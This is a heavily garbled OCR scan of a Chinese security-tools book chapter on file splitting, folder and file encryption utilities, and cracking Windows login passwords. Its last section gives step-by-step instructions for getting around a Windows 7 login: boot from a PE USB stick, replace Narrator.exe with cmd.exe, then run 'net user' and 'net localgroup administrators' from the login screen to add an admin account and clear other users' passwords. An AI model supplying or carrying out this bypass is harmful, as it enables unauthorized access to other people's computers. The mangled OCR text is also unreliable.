
使 用 向 导 辟 分 文件 


| C:\Users\Administrator Desktop 


CRC 


慎 用 CRC 


单 击 “ 向 导 ” 按 钮 。 


STEP07: 打开 “和 辟 分 模式 ”对 话 框 


分 点 / 存 情 方式 


名 电子 邮件 (800KB) 
加 软盘 (1.3MB) 

加 超级 软盘 (100MB) 
® Zip 100 (39MB) 

DS zip 250 (245ME) 
DS zip 750 (745MB) 
合 74 分 钟 CD (545MB) 
名 80 分 钟 CD (599MB) 
DS DVD {4,5GB) 


ZIp1 00。 


国 设置 分 发 /存储 方式 ,此 此 处 选择 EF 下 一 


步 ” 按 钮 。 


GO ， HEH Ai FI) ， 资 H， 克 六 ”| 九 咱 医 王 天 
文件 (F) ”编辑 (E) ”查看 (V) 工具 (T) ”帮助 (H) 
新 建文 件 突 


组 织 包含 到 库 中 ~ 
六 收藏 夹 
思 下 载 
更 点 面 = 1 府 齐 
这 最 过 访 问 的 位 置 0002.chp 


0007.chp 0009.chp 0010.chp 


花卉 


7 
0012.chp 0013,.chp 0014,.chp 0015.chp 


STEP06: 打开 “选择 文件 ”对 话 杠 


选择 文件 I 


欢迎 使 用 Chop! 

chop 是 一 个 易于 使 用 轻便 快速 的 六 件 分 着 程 序 

它 的 首要 功能 只 是 分 虽 文 件 以 供 分 发, 但 是 在 分 旬 形 态 下 

某 些 文件 也 是 可 用 的 , 所 有 其 它 区 件 必 须 在 使 用 前 先 重 新 组 合 ， 
选择 要 对 分 或 合并 的 文件 

F 雇 可 公司 图 库 紫 让 1 


单 击 “ 选 择 ” 按 钮 ， 在 打开 的 er “下 一 
对 话 框 中 选择 要 劈 分 的 文件 。 步 ”按钮 。 
STEP08: 打开 “选择 目标 位 置 ”对 话 杠 


选择 目标 位 置 [S| 


璧 分 /合并 的 文件 存 铺 位 置 

个) 卓 面 

全 与 来 源 文件 相同 目录 

加 在 桌面 上 创建 同名 的 文件 来 

加 在 选中 文件 来 中 创建 同名 的 文件 来 


记 ] 目 标 位 置 在 可 移动 媒体 上 , (例如 : 软盘 ,) 


F: 资 业 \ 公 司 图 库 习 弄 


a 


国 选中 “在 选中 文件 国 单 击 “ 选 择 ” 国 单 击 


夹 中 创建 同名 的 文件 按钮 ， 设 置 劈 分 “下 一 步 * 
夹 ” 单 选 按钮 。 文件 的 存储 位 置 。 按钮 。 
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合 人 他 他 


Pe -有 


工具 全 攻略 


STEP09: 打开 “选项 ”对 话 框 
选项 | 


司 使 用 Chop 

局 创建 BATx 件 立 样 我 就 不 必 册 使 用 Chop 程 序 
使 用 CRC 

加 密 


加 密 字符 忠 , 切 和 忘记 |! 


按 完 成 "以 劈 分 /合并 文件 
< EW RR 
选中 “使 用 Chop” 单 选 按 单 击 “ 完 成 ” 
钮 ， 勾 选 “ 加 密 ” 复 选 框 并 输 按钮 ， 即 开始 区 
入 加 密 密 码 。 分 文件 。 


STEP11: 合并 臂 分 后 的 文件 


要 劳 分 /合并 朋 文 件 

未 选中 文件 

无 文件 

描述 

由 使用 

加 密 

忠 加 密 

答 出 格式 

电邮 "| 数量 |: 


合并 方式 


在 “Chop” 对 话 框 中 单 击 “ 选 择 ” 按 钮 。 


Chop 


STEP13: 返回 “Chop” 窗 口 


Chop 1.51 
要 丑 分 /合并 的 文件 
F: 资 料 诚 卉 屁 弄 0001,dp 


花 间 .rar 


38, 348, 556 字 节 


EE= 


输出 目标 位 置 
同 铬 文件 来 


F: 资 料 谍 卉 
CRC 
团 使 用 CRC | 


团 单 击 “ 选 择 ” 按 钮 ， 设 置 
合并 后 文件 的 存储 位 置 。 合并 ”按钮 。 
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STEP10: ” 忌 分 文件 完成 


chop 1.51 


单 击 “ 继 续 ” 按 钮 ， 返 回 主 界面 。 


STEP12: 选择 要 合并 的 文件 


上 ”计算 机 ， 本 地 磁盘 (Fj) 资料 ， 在 卉 


名 称 

图 花卉 000l.chp 
图 花卉 0002.chp 
图 花 才 0003.chp 
加 克 才 0004.chp 
因 苑 者 0005.chp 
图 花卉 0006.chp 
图 到 者 0007.chp 
图 花卉 0008.chp 
图 花卉 0009.chp 
图 在 褒 0010.chp 


图 匹 赤 0011.chp 
网 一 二 mnanm - 


文件 名 (N): 死者 0001. 中 p 


选择 要 合并 的 文件 ， 这 里 国 单 击 “打开 ' 
必须 选择 chp 类 型 的 文件 。 按钮 。 


STEP14: 合并 完成 


Chop 1.51 


单 击 “开始 单 击 “ 继 续 ” 按 钮 ， 返 回 主 界面 。 


和 10 


10:2.2 ”文件 夹 加 密 工具 


密码 攻防 


除了 给 计算 机 中 的 文件 进行 加 密 , 还 需要 为 文件 夹 加 密 
市 的 加 密 功 能 可 以 对 文件 到 以 及 和子 文 件 进 行 加 密 ， 


行 加 密 。 
1. 使 用 Windows 系统 自 带 的 加 密 功 能 


。 使 用 Windows 系统 中 目 
还 可 以 使 用 专门 的 工具 对 文件 夹 进 


如 末 不 而 望 别 人 访问 目 己 创建 的 和 内容， 可 
的 文件 夹 及 其 子 文件 进行 加 密 。 


具体 的 操作 步骤 如 下 。 
STEP01: 双击 “计算 机 ”图 标 


还 原 以 前 的 版 本 (V) 
使 用 百度 杀毒 扫 控 
包含 到 库 中 四 
文件 (站 ” 编 强 (E) 诗 者 V) ~ Im 帮助 国 用 Malwarebytes Anti-Malware 扫 扩 
上 组 织 - 司 打 开 包含 到 库 中 洲 ” 添 加 到 压缩 文件 (A).… 
一 一 小 沃 加 到 "新 建文 件 夫 ,rar"() 
蕊 ”压缩 并 E-mail... 
洲 ”压缩 到 "新 建文 件 夫 ,rar" 并 E-mail 


发 送 到 (N) 
更 切 (T) 

复制 ( 〇 ) 
部 ppTV 视 频 四 创建 快捷 方式 (S) 


人 一 一 
-新建 文件 夹 修改 日 期 : 2014/9/ 删除 (D) 
文件 去 重 命 名 (M) 


内 


六 收藏 夫 
思 下 载 
轩 | 训 面 
过 县 拆 访 问 的 位 置 


园 库 


于 本 
[1 my 9 五 [1 EE 日 
滞 人 
存档 和 索引 属性 

回 可 以 存档 文件 来 后 

团 除 了 文件 属性 外 ， 还 允许 索引 此 文件 夹 中 文件 的 内 容 并 ) 


压 旺 或 加 密 属性 
冲压 缩 内 容 以 便 节 省 磁盘 空间 代 ) 


加 密 内 容 以 便 保 护 数 据 凶 ) 


详细 信息 种 ) 


勾 选 “加 密 内 容 以 便 ” 单 击 “ 确 定 ”按钮 。 
保护 数据 ” 复 选 框 。 


运用 Windows 目 带 的 加 密 文 件 系统 对 目 己 创建 


STEP02: 打开 属性 对 话 框 


常规 ”| 安全 ”|[ 以 前 的 版 本 
| | 新 建文 件 来 


类 型 : 
位 置 
二 路: 
占用 空间 : 
包 合 : 
创建 时 间 : 
属性 : 


交 件 来 

E: 下 选单 

0 字 节 

0 字 节 

0 个 文件 ，0 个 文件 来 
2013 年 11 月 19 日 ，10:16:22 

只 读 (以 应 用 于 文件 来 中 的 文件 ) 外 ) 
记 隐 藏 节 


单 击 “ 高 级 ”按钮 。 


STEP04: 打开 “确认 属性 更 改 ” 对 话 框 


您 已 经 选择 对 属性 进行 以 下 更 改 : 


加 密 


在 严 肥 人 人 可 区 用 于 帮 汪 全 3 或 者 是 否 要 将 它 应 用 于 所 有 子 广 


名 避 将 更 改 应 用 于 此 文件 来 
图 将 更 改 应 用 于 此 文件 来 、 子 文件 来 和 文 


贺 根据 需求 确定 ” 辆 单 击 “ 确 定 ”按钮 , 即 完成 
应 用 范围 。 文件 夹 的 加 密 操作 。 
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客 志 
PE 工具 人 攻 了 


利用 Windows 系统 自 带 的 加 密 功 能 对 文件 夹 进行 加 密 , 只 适合 NTFS 文件 
提示 。 系统 ， 而 不 适合 FAT32 文件 系统 。 


2. 文件 夹 加 密 超级 大 师 

文件 夹 加 密 超 级 大 师 是 一 球 强 大 的 文件 和 文件 夹 加 密 软 件 ， 上 共有 文件 加 密 、 文 件 夹 加 
密 、 数 据 粉碎、 彻底 隐藏 便 盘 分 区 、 蔡 止 或 只 读 使 用 USB 设备 等 功能 。 

使 用 “文件 来 加 密 超级 大 师 ” 软 件 进行 加 密 的 其 体操 作 步 又 如 下 。 


STEP01: 运行 软件 STEP02: 选择 要 加 密 的 文件 夹 


入 立 件 夹 加 密 超 统 大 师 未 证 册 版 * ) 


文件 夹 僵 装 | 磁盘 保护 | 数据 粉碎 | 高 级 
当前 显示 办 电 加 密 玄 件 天 。 []《 解 室 或 解除 伪装 请 在 相应 记录 上 单 击 ， 单 击 右键 漳 出 快捷 荣 单 er a 
序号 “7 侠 正 吕 站 件 夹 踢 征 i i 由 - 09 Favorites 
i | HC My Documents 
I 申 -化 Frogram Files 
| 9 邮 
”向 -加 回收 中 心 
让 国 婚 礼 归 


文件 来 加 密 超 级 大 师 16.06 版 权 所 有 2005 - 2010 夏 冰 软件 ， [ 忆 入 六 注册 码 


单 击 “ 文 件 夹 加 密 ”按钮 。 团 选中 要 加 密 的 文件 夹 。 辆 单 击 “ 确 定 ” 按钮 。 
STEP03: 设置 加 密 密 码 STEP04: 返回 主 窗口 


三 文件 赤 加 过 起 级 大 师 《 未 往 册 上 诛 *+ 


文件 来 加 密 立 件 加 窗 | 文件 来 协 装 | 磁盘 保护 | 数据 粉 玉 】 | 


当前 显示 阿 电 加 密 文件 赤 口 〈 解 窑 或 解除 伪装 请 在 相应 记录 上 单 击 ， 单 击 右键 弹出 快捷 菜单 ) 


[vm 加 密 交 件 夹 D"\ 图 片 \picture 


加 座 类 型 : 回 装 电 ”加 隐 启 ”四 全 面 ”加 人 金 外 ”加 移 动 
| 取消 


加 根据 提示 输入 设置 的 02 出 单 击 “ 加密” 按钮 。 查看 加 密 的 文件 夹 并 双击 该 文件 夹 。 
加 密 密 码 。 


加密 后 文件 夹具 有 最 高 的 加 密 强 度 ， 且 防 删 除 、 防 复制 、 防 移动 ,还 有 打开 功 


提示 “能 〈 即 临时 解密 )， 这 让 每 次 使 用 加 密 文 件 夹 或 加 密 文 件 后 不 用 重新 加 密 。 
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STEP05: 输入 密码 


| 入 文件 夹 加 密 超 级 大 师 一 请 输入 密 三 二 


| 二 站 人 忻 夹 打开 后 ,不 使 用 时 自动 关闭 。 2 


输入 设置 的 密码 ， 可 临时 解密 并 打开 该 文件 夹 。 如 
果 单 击 “ 解 密 ” 按 钮 ， 则 进行 解密 操作 。 


STEP07: 选择 要 加 密 的 文件 


查找 范围 (I): | 筷 电影 | ] 回访 世 四 


DYEo_Ts 


Recent 回 

[爱情 呼叫 转 荐 2_ 受 情 左 灯 右 行 ] [真正 DVD 高 清晰 版 ]. rmvb 

[ [站 时 台 所 0DD 国 语 中 字 无 水 印 ] [ 禄 小 宁 08 最 新 太 片 ] [66 原 创 ]. rmvb 

摧 面 [ii 《 十 月 围城 $ 09 年 最 新 动作 剧情 大 片 DWD 国 语 中 字 . rmwb 
[09 最 新 成 龙 励志 喜剧 人 寻找 成 龙 $ 国语 DWD 中 字 . rmvb 

[大 内 密探 灵 灵 涧 -抢先 版 + 预 肯 抢 先 版 . rmvb 


EY [RER| 非常 完美 -抢先 版 抢先 版 . rmvb 
我 的 文档 。 | 询 花木 兰 清晰 版 ,rmwb 
fi 建国 大 业 清晰 版 首发 清晰 版 上 zmvb 
起 建 国 大 业 清晰 版 首发 清晰 版 B. rmvb 
我 的 电脑 在 店 .ymvb 


BE 呈 
mseo  D 


V1 蝇 过 育 式 打 环 尺 1 


国 选中 要 加 密 的 文件 , 这 里 ” 国 单 击 “打开 
选择 rmvb 类 型 的 文件 。 按钮 。 


STEP09: 正在 加 密 


| 局 文 件 夹 加 密 超 级 大 师 - 加 密 文 件 : 0 电影 查 店 rmvh =: 


处 理 数据 : |D\ 电 如 \ 夜 店 .rmvb 


处 理 进 度 : 有 一 一 


D0:0:3 


查看 加 密 进度 ， 单 击 “ 终 止 ”按钮 可 中 止 加 密 。 


STEP11: 打开 “请 输入 密码 ”对 话 框 


取消 


在 “密码 ”文本 框 中 输入 正确 的 密码 ， 单 击 “ 打 开 ” 
按钮 可 打开 该 文件 。 


密码 攻防 


STEP06: 对 单个 文件 进行 加 密 


对 立 件 赤 加 鹤 起 领 大 师 ( 未 福 册 刻 》 


单 击 “ 文 件 加 密 ” 按 钮 。 


STEPO8: 


设置 加 密 密 码 


| 局 加 袜 D'' 电 影 ' 夜 店 .rmvb 


ER | 


加 全 四 


单 击 “ 加 密 ， 
按钮。 


根据 提示 输入 加 密 密 码 
并 选择 加 密 类 型 。 


STEP10: 加 窖 完成 


等 文件 赤 加 裤 起 角 大 师 志 未 证 志 记 


交 件 加密 文件 加 名 | 六 件 天 信 凌 | 。 磁盘 保护 “| 。 淫 据 符 研 


当前 显示 jo 密 文件 | ] 5 解 客 或 解除 擅 装 请 在 相应 记录 上 单 击 ， 单 击 右键 弹 出 快捷 菜单 ) 


厅 号 ”信任 必 了 Y 件 蛤 全 


一 = 


在 主 窗口 中 的 “文件 ”列表 中 看 到 成 功 加 密 的 文件 ， 
双击 该 文件 。 


STEP12: 


将 文件 夹 伪 疙 成 特定 的 图 标 
过 文件 支 加 杰 超 级 大 师 ( 未 注册 版 % ) 


立 件 夹 的 六 


当前 显示 区 电 加 寥 文 件 夹 | |】 ( 解密 载 解 除 护 闭 请 在 相应 记录 上 单 击 ， 单 击 右键 弹出 快捷 菜单 ) 


女 件 夹 耻 径 


序号 ” 站 件 夹 避 


在 主 窗口 中 单 击 “ 文 件 夹 伪装 ”按钮 。 
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Py > 
全- 工具 全 攻略 


合 人 他 他 


STEP13: 选择 要 伪装 的 文件 六 
| 加 训 览 文件 去 
请 尘 择 要 伪装 的 妆 件 夹 


: HD Ny Documents 
: 由 -也 Froeram Files 
昌国 二 
| 自问 回收 中 心 
由 鸭 婚礼 归 
| 量 - 回 图 片 

: 由 03 picture 

| 由 "加 图 F 

由 -人 文字 


贺 选 定 要 伪装 的 文件 夹 。 国 单 击 “ 确 定 ” 按 钮 。 
STEP15:” 伪装 成 功 
| 画 文件 夹 加 灾 超 级 


单 击 “确定 ”按钮 。 
STEP17: 返回 主 窗口 


三 立 件 天 加 至 起 领 大师 已 未 往 册 原 * 


厅 S ” 区 件 赤 名 


文件 来 加 客 超 级 太 师 19,06 版 权 所 有 2005 - 2010 夏 冰 软件 ， |_ 办 办 注册 到 现在 购买 | 
单 击 “高 级 设置 ”按钮 。 
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STEP14: 选择 要 伪 狼 的 类 型 
二 请 选择 要 俩 装 的 类 型 


四 FTP 浆 件 夹 。 ”四 我 的 电脑 加 控制 面板 


[本 网 上 施 居 [本 所 号 连接 辐 打 印 机 
回回 收 站 回 caB 文 件 由 缓存 交 件 
[可 web Folders | |IE 国 预 订 净 件 夹 


国 匀 选 “htm 文件" 复 选 框 。 辆 单 击 “确定 " 按钮 。 
STEP16: ”打开 伪装 文件 夹 所 在 的 文件 夹 


工具 (T) “帮助 (H) 
放映 幻灯 片 


文件 [ 过 引 () 查看 (V 


组 织 包含 刘 库 中 了 新 建文 件 去 


该 文件 夹 已 伪装 为 html 类 型 的 文件 。 
图 扣 开 “高 级 设置 ” I 


癌 信用 本 软件 密友 

| 半 次 件 金 外 加 密 成 功 后 删除 原 交 件 
国文 件 移动 加 客 成 功 后 册 除 原文 件 

加 文件 来 移动 加 密 成 功 后 册 | 除 原 廊 件 卖 


[同文 件 夹 全 钻 加 密 成 功 后 删除 原 廊 件 来 
一 一 软件 隐 启 选项 

[本 在 系统 右键 菜单 添加 [加 密 ] 莹 单项 

| 站 特 殊 显 示 加 密 玄 件 夹 


运行 人: 


为 该 软件 设置 密码 及 其 他 属性 。 


< 化 10 章 


密码 攻防 


10.2.3 WinGuard Po 加 密 应 用 程序 


WinGuard Pro 能 用 密码 保护 程序 、 窗 口 和 网 页 ， 加 密 私 人 文件 和 文件 夹 。 它 为 计算 机 
提供 了 多 合 一 的 安全 解决 方案 ， 能 够 锁 住 时 和 面 、 月 动 键 、 任 务 键 、 茶 止 软件 安 闻 和 Internet 
接 入 等 。 使 用 WinGuard 加 密 应 用 程序 的 具体 操作 步骤 如 下 。 


STEP01: 下 载 并 安装 WinGuard Pro 


No password found, the defualt 
Is: latmein 


Password: 


在 桌面 上 双击 图 标 ， 打 开 辆 输入 默认 密码 并 
“WinGuard Configuration” 单 击 “Enter” 按钮 。 
对 话 框 。 

STEP03: 切换 至 “Password” 选 项 卡 


WinGuard Pro 2014 [= | 


TaskLock Off. If you Updated WinGuard, it turns On when you Restart 


EEC 


New Password 


Password 


Confirm New Password: ** 


根据 提示 输入 密码 。 国 单 击 “Apply” 按 钮 。 


STEP05: ”查看 已 加 密 的 文件 


文件 (FP) ”编辑 (E) 青春 (V) ”工具 (TD) 帮助 (H) 
组 织 ~ 包含 到 库 中 ~ 新 建文 件 夫 


YY 收藏 夫 

由 下 载 

园 京 面 

缠 最 近 访 问 的 位 置 
司库 

部 PPTV 视 频 


NN 一 一 一 一 


| 2 个 对 象 


文件 加 密 后 图 标 发 生变 化 。 若 要 查看 加 密 后 的 文件 ， 
双击 该 文件 ， 对 文件 进行 解密 。 


STEP02: 打开 WinGuard Pro 主 究 口 


TasklLock Off. If you Updated WinGuard, it turns On when you Restart 


p Not Active 


Locked Desktop Programs & Apps on this PC: 
[EE] Weather 


Turn On TaskLock Now 


TaskLock 


| Lock a Task.,.. 


Options: 


Change Password 
Delete Task 


ser Accounts 


@ Task Manager is Unlocked Fix This 


Version: 8.16 
0 Check for Updates 


全 About WinGuard 


WinGuard Online 
You have 1 Offer (click to view) 


查看 WinGuard Pro 的 各 项 功能 。 


STEP04: 切换 至 “File Protection” 选 项 卡 


9 WinGuard Pro 2014 (oo | 一 lS 


TaskLock off. If you Updated WinGuard, itturns On when you Restart 


Ea 


Enter the full path of the file or folder to encrypt or decrypt: 
FA 资料 \ 花 卉 \ 花 卉 .rar 


File Protection 


Browse for Directory... | 


Encrypt (128bit AES) D 


Help Manual 


按钮 ， 选 择 要 加 密 的 文件 。 钮 ， 对 文件 进行 加 密 。 

STEP06: 打开 “WinGuard Configuration” 
对 话 框 

WinGuard Configuration 


Enter your Password to access 
WinGuard Configuration. 


Password: 


输入 设置 的 加 密 密 码 。 较 单 击 “Enter” 按 钮 。 


2135 


客 有 于 
PE 工具 人 攻 了 


全 人 人 他 
STEP07: 打开 WinGuard Pro 主 窗口 STEP08: 查看 已 解密 的 文件 


9 WinGuard Pro 2014 


TaskLock Off. If you Updated WinGuard, it turns On when you Restart 


文件 ( ”编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 
组 织 s* 包含 到 库 中 ~ 新 建文 件 夫 


六 收藏 夫 
思 下 载 
图 | 讲 面 
交 最 | 括 访 问 的 位 置 


ET 
在 “File Protection” 单 击 “Decrypt” 已 解密 的 文件 恢复 为 原来 的 RAR 格式 。 
选项 卡 下 选中 要 解密 的 按钮 ， 即 可 对 文件 
文件 。 进行 解密 。 


10.3 条 


统 密码 加 密 解密 工具 


10.3.1 利用 Windows 7 PE 破解 系统 登录 密码 


Windows 7 PE 是 一 款 可 安装 在 便 盘 、U 盘 上 的 软件 ， 它 可 以 为 用 户 提 供 以 独立 于 本 地 
操作 系统 的 临时 Windows 7 操作 系统 ， 含 有 Ghost、 便 禹 分 区 、 密 个人 破解 以 及 数据 恢复 等 
功能 。 Windows 7 PE 之 所 以 有 这 么 多 功能 , 是 因为 它 运 行 在 内 存 中 , 下 面 曝光 利用 Windows 
7 PE 破解 系统 登录 密码 的 操作 方法 。 


STEP01: ”选择 进入 BIOS STEP02: 选择 “Advanced BIOS Features” 


CHOS Setup Utility - Copyright (C) 1984-2889 fward Software 
Hemory Fregqguency For DDRZ Bee (IDual Channel Mode)} : -一 -一 - 


SATA Channel < >» Standard CHOS Features Load Fail-Safe Defaults 


SANTRA Chanmel : Mone 
SATA Channel : STI3250626A5 3.AAR 
SATA Channel : Mone 
| : Ione 
SATA Channel : None 


» fdvanced BIOS Features Load Optinized Defaults 
* Integrated Peripherals Set Supervisor Password 
> power Managenent Setup Set User Passuord 

» PnP/PCI Configurations Ss 

CHOS checksum crror - Defaults loaded $ ave & Exit Setup 

上 FC Health Status | 


Press Fi to continue, DEL to enter SETUP > MB Intelligent Tueaker(M,1.T.) 


Epo: por: :To bh i rAd i i | 


重新 启动 计算 机 , 当 显 示 自 检 界 面 时 , 按 <Del> 键 ， 打开 BIOS 界 面 , 利用 方向 键 选择 “Advanced BIOS 
选择 进入 BIOS。 Features ， 按 <Enter> 键 。 


进入 BIOS 的 其 他 方法 
目前 市 场 上 常见 的 BIOS 并 非 只 有 一 种 ， 有 些 计 算 机 在 开机 自 检 壳 面 中 会 显示 


进入 BIOS 所 需要 的 热 键 , 有 些 则 不 显示 进入 方法 . 对 于 不 显示 进入 方法 的 计算 机 ， 
可 在 主板 说 明 书 中 查看 进入 BIOS 的 方法 。 进 入 BIOS 通常 都 是 通过 按键 栓 上 的 某 
一 个 功能 键 实现 的 ， 常 用 的 按键 主要 有 《F2)、《Del)、《Esc) 键 等 。 
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STEP03: 选择 “Hard Disk Boot Priority” 


CHOS Setup Utilityu ~ Copyright (CE) 1984-2889 
fAdvanced BIOS Features 


* Hard Disk Boot Priority 
First Boot Device 
Second Boot Device 
Third Boot Device [CDROM] 
Password Check [Setup] 
HDD S.M.A.R.T. Capability [Disabled] 
Linit CPUID Max. to 3 [Disabled] 
No-Execute Menory Protect [Enabled] 
CPU Enhanced Halt (CIE) {Enabled] 
LPYU Thermal Honitor ,2(TM2) [Enabled] 


选择 “Hard Disk Boot Priority” 选项 ,然后 按 
<Enter> 键 。 


STEPOS: 


» Hard Disk Boot Priority 
First Boot Device 
Second Boot Device 
Third Boot Device 
Password Check 
HDD S.M.A.R.IT. Ca 
Linit CPUID Max. 
No-Execute Menory 
CPU Enhanced Halt 
Hl 
CPU 了 IST Functionll CDROM 
Virtualization ?el 21P 
Init Display Firs|l USB-FDD 


加 选择 “ First Boot Device 四 网 选择 “Hard Disk” 
后 按 <Enter> 键 。 选项 , 然后 按 <Enter> 
键 。 


[Press Enter] 
[Hard Disk] 
[USB-HDD] 


设置 从 硬盘 启动 


[Press Enter] 
[Hard Disk] 
[USB-HDD] 
[CDROMN] 


First Boot Device 


Floppy 
LS120g 


保存 对 BIOS 设 音 所 做 的 更 改 


© 


当 在 BIOS 中 完成 从 UU 盘 局 动 的 设置 后 ， 可 按 〈F10》 键 ， 


STEP04: 选择 “USB-HDD” 选项 


y ~ :0pUTI9 sl 
Hard Disk Boot Prior ty 
1. USB-HDDG KingstonDataTraveler 2 


Zz. Chg HF. NU MIICUONHJS-VOL/HY 
3. Bootable fdil-in Cards 


选择 “USB-HDD” 选 项 ， 然 后 按 <+> 键 ， 将 其 移 


至 最 顶端。 
STEP06: 选择 PE 工具 箱 


GRUB4DOS 8.4.5b 2610-86-63, Mem: 638KA509MABM, End: 34C7C7 


阐 硬 实用 的 绝对 PE 工 县 灯 
现在 为 您 提供 进入 PE 或 D0S 的 选择 项， 选中 要 进入 的 项 目 ， 扶 


加 [91] 纪 ) PE 工具 档 | 
[92] MaxD0S Plus 本 上 县 奖 
[83] 以 硬 盘 启 动 计 算 机 
[94] 旦 新 局 动 计 算 机 


[85] 关闭 计算 机 


保存 BIOS 设置 后 重新 启动 计算 机 ， 计 算 机 自动 从 
U 盘 启 动 ， 在 界面 中 选择 “绝对 PE 工具 箱 ”， 按 
<Enter> 键 。 


然后 在 弹出 的 对 话 框 


扣 不 中 输入 “Y” 并 按 (Enter) 键 ， 计 算 机 将 保存 对 BIOS 所 做 的 设置 并 自动 重新 启动 
双击 “计算 机 ”图 标 


ps 


VDM 庶 拆 泡 上 


STEP07: 


回收 站 玻 盘 碎 且 整理 
程序 


ee 


月 动 U56 兰 于 
5 时 


打开 Windows7 PE 系统 桌面 ， 双击 " 计算 机 ， 图 标 。 


所 有 程 夺 


STEP08: ”更改 Narrator 文件 名 


二 1 全 二 | ~ 计算 机 - 系统 保留 人 C] = Windows ”System32 < 


组 织 ~ 打开 | 新 建文 件 来 


上 收藏 夹 


久 | napipsec.dll 
| 切 | NAPMONTR.DLL 
EY NAPSTAT.EXE 


有 库 


9 Narrator,EXE 


| 急 | NativeHooks,.dll 


打开 “System 32” 将 “Narrator.exe” 的 
文件 夹 窗口 改 为 “Narrator0.exe”。 


过 | 7 


更 改 文件 名 的 第 用 方法 主要 有 两 种 : 
在 弹出 的 快捷 菜单 中 选择 “ 重 命 名 ” 


一 种 是 右 击 待 更 改 的 文件 选项 ， 
PR WA 


键 ; 第 二 种 是 选中 待 更 改 的 文件 选项 ， 按 〈F2》 键 后 输入 新 的 文件 名 ， 然 


提示 后 按 《Enter〉 刍 。 


STEP09: ”更改 cmd 文件 名 


， 计算 机 ~ 系统 保留 {C:) ~ Windows ~ System32 ~ 


姐 织 打开 ”新建 嫌 件 来 


[a clip,exe 
| 雹 | dusapi.dll 


使 用 相同 的 方法 将 “cmd.exe” 的 文件 名 更 改 为 
“Narrator.exe”。 
STEP11: 选择 讲述 人 


名 轻松 访问 


人 
按 下 空格 键 选择 高 亮 旺 示 的 选项 


肖 法 第 内 容 (人 太 信 


加 勾 选 “朗读 屏幕 内 容 ” 辆 单 击 “ 确 定 ” 按 钮 。 


(讲述 人 ) ” 复 选 框 。 
STEP13: 为 新 账 尸 赋予 管理 员 权 限 


C\Windows\System32\Narrator.exe 
邓 纹 无 半 和 在 消息 区 尾 中 为 hpplication 找 玫 上 月 息 号 汐 gx2358 的 亲 
保留 所 有 权利 。 


中信 所 有 ec 2009 Microsoft Corporat ion. 
攻 宇 @x8 有 的 消 es 


统 无 法 在 消息 文 忻 中 为 System 找到 背 
G:\Windows “system32>2net user kane 123 /add 


种 全 -成功 完成 。 


陆 作成 外 localgroup administrators kane add 
> 成功 完 


输入 “net localgroup administrators kane /add ”后 


按 <Enter> 键 。 
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STEP10:” 单 击 “轻松 访问 ”图 标 


拔 下 U 盘 后 重启 计算 机 ， 在 系统 登录 界面 中 单 击 左 
下 角 的 “轻松 访问 ”图 标 
STEP12: ”利用 DOS 命令 添加 账户 


EB CWindows\System32\Narrator.exe 
系统 无 层 企 诊 四 双人 忻 中 为 hpplication 找 天 诅 尽 号 为 @x2 


h 同 可 所 有 Cc> 2003 Microsoft Corporation. 1 下 采 贸 所 有 相 
条 济 无 法 在 消息 文件 中 为 System 找到 消息 El Qx8 sob 肖 


性 Windows \system32>net user kane 123 Aadd 


[ee 成 功 守 成 。 


输入 “net user kane 123 /add” 后 按 <Enter > 键 ， 
添加 密码 为 123 的 账户 。 
STEP14: 选择 新 创建 的 账户 

加 


再 次 重启 计算 机 ， 可 看 见 创建 的 kane 账户 ， 单 击 该 
账户 对 应 的 图 片 。 
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“net localgroup administrators kane/add” 是 指 将 名 称 为 kane 的 账户 添加 到 


administrators 组 中 ， 让 其 成 为 管理 员 账 户 ， 这 样 就 可 以 直接 进入 操作 系统 ， 并 
提示 “清除 其 他 账户 的 登录 密码 。 


STEP15: ”输入 登录 窒 码 STEP16: ”成 功 进入 系统 


Rn 


国 输入 该 账户 的 登录 密码 123。 国 单 击 “登录 " 按钮 。 成 功 进 入 系统 桌面 ， 已 成 功 绕 过 登录 密码 进入 操作 


系统 。 
STEP17: ”选择 用 户 账户 STEP18: ”管理 其 他 账户 
| 更 改 用 户 帐 户 
加 >| 国 ，3 和 面 反 ， 所 有 控制 本 术 页 ， v | 他 外 | 元帝 芝 测 面 折 
更 改 密码 a |。 
调整 计算 机 的 设置 查看 方式 ， 大 图 标 ~ i [nb kane 
更 改 图 片 3 
册 示 统 有 纪 5 未 国 更 改 帐户 名 称 
国 性 能 信息 和 工具 闻 颜色 管理 全 更 kf 户 类型 
疑难 解答 
昌 证 国 | 桌面 小 工具 
若 要 清除 指定 账户 的 密码 ， 则 在 “控制 面板 ”窗口 中 ”在 “更 改 用 户 账户 ”界面 中 单 击 “ 管 理 其 他 账户 ” 链 
单 击 “ 用 户 账户 ”链接 。 接 。 


STEP19: 选择 要 清除 密码 的 账户 STEP20: ”删除 登录 密码 


更 改 John 的 帐户 
更 改 帐户 名 称 


[ER 用 户 帐户 ， 管理 帐户 ~ | 他 | 起 过 芭 壤 奇 迷 
选择 希望 更 改 的 帐户 


| kane 
管理 员 


设置 家 长 控制 
要 改 帐户 类 型 
删除 帐户 

管理 其 他 帐户 


在 “选择 希望 更 改 的 账户 ” 界面 中 选择 要 清除 密码 ” 单 击 “ 删 除 密 码 ” 链接 即 可 删除 该 账户 的 登录 密码 。 
的 账户 。 


奢 码 保护 


Guest 
来 宾 帐 户 没 有 启用 


二] 


Pe > 
和- 工具 全 攻略 


会 全 对手 
10;3.2 ”利用 客 码 重 置 盘 破解 系统 登录 密码 


密码 重 置 盘 是 一 种 能 够 不 限 次 数 更 改 登录 密 但 的 工具 ， 利 用 它 可 以 随意 更 改 指定 用 户 
账户 的 登录 密码 。 无 论 是 对 于 黑客 还 是 目 己 ， 密 但 重 置 盘 都 有 看 很 重要 的 作用 。 利 用 密码 
重 置 嫩 人 破解 系 统 登 录 密 但 包括 创建 密码 重 置 盘 和 修改 密码 两 个 阶段 ， 下 面 曝 光 具 体操 作 。 


STEP01: 选择 用 户 账 户 STEP02: 选择 创建 密码 重 设 盘 


人 JE | 辐 ， 拉 和 面板 、 所 有 控制 面板 项 ， = | 好 | 区 夫 世 击 后 上 


调整 计算 机 的 设置 查看 方式 六 


GE 弛 < 所 有 控制 面板 项 用户 帐户 


et 更 改 用 户 帐户 
管理 字 的 赁 丘 


= ES "| 


村 性 能 信息 和 工具 


更 改 安 码 
而 际 否 本 
符 接 车 | TID 更改 图 片 
管理 文件 加 密 证 书 国 更 改 帐户 名 称 
配置 高 级 用 户 配 置 w 件 层 性 哺 更 改 帐户 类 型 


疑难 解答 
革 语言 识别 
国 则 自动 播放 
